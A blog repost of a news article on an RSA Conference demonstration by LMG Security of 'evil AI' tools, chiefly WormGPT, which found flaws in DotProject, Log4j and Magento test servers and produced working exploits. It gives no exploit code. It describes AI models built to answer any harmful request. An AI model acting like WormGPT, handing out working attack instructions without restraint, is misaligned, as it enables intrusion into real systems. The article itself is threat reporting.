Search This Blog

Powered by Blogger.

Blog Archive

Labels

About Me

Threat Analysts Reveal How "Evil AI" is Changing Hacking Dynamics

As these "evil AI" platforms advance quickly, cybersecurity experts fear that traditional defences will fail to keep up.

 

A new wave of AI tools developed with no ethical restrictions is allowing hackers to detect and exploit software vulnerabilities faster than ever before. As these "evil AI" platforms advance quickly, cybersecurity experts fear that traditional defences will fail to keep up.

Earlier this week at the annual RSA Conference in San Francisco, a crowded room at Moscone Centre assembled for what was touted as a technical investigation of artificial intelligence's involvement in contemporary hacking.

The event, conducted by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory; it would include a rare, live demonstration of so-called "evil AI" in operation, a topic that has quickly progressed from cyberpunk fiction to real-world concerns.

The CEO and founder of LMG Security, Davidoff, opened with a sobering reminder of the constant threat posed by software flaws. According to PCWorld senior editor Alaina Yee, Durrin, the company's Director of Training and Research, swiftly changed the tone. He popularised the idea of "evil AI"—artificial intelligence tools created without moral boundaries that can spot and take advantage of software vulnerabilities before defences can respond.

"What if hackers utilise their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?" Durrin asked the audience, previewing the unsettling demonstrations to come. 

The team's attempts to acquire one of these rogue AIs, such as GhostGPT and DevilGPT, frequently resulted in irritation or discomfort. Finally, their persistence paid off when they discovered WormGPT, a tool mentioned in a Brian Krebs piece, for $50 via Telegram channels.

As Durrin explained, WormGPT is effectively ChatGPT without the ethical constraints. It will respond to every question, regardless of how harmful or illegal the request. However, the presenters emphasised that the main concern is not the tool's presence, but rather its capabilities. 

The LMG Security team began by running an older version of WormGPT through DotProject, an open-source project management platform. The AI accurately discovered a SQL vulnerability and offered a simple exploit, but it failed to construct a viable assault, most likely due to its inability to parse the entire codebase.

A revised version of WormGPT was then entrusted with investigating the famed Log4j issue. This time, the AI not only discovered the issue, but also gave enough information that, as Davidoff noted, "an intermediate hacker" could utilise it to craft an exploit. 

The true surprise came with the most recent iteration: WormGPT provided step-by-step instructions, complete with code specific to the test server, and those instructions worked beautifully.

To test the restrictions further, the team created a susceptible Magento e-commerce platform. WormGPT discovered a complicated two-part exploit that was undetected by popular security products such as SonarQube and ChatGPT itself. During the live demonstration, the rogue AI provided a full hacking guide unprompted and with alarming speed. As the discussion came to a close, Davidoff remarked on the rapid progress of malicious AI tools.
Share it:

Cyber Security

Evil AI

RSA Conference

Threat Landscape

WormGPT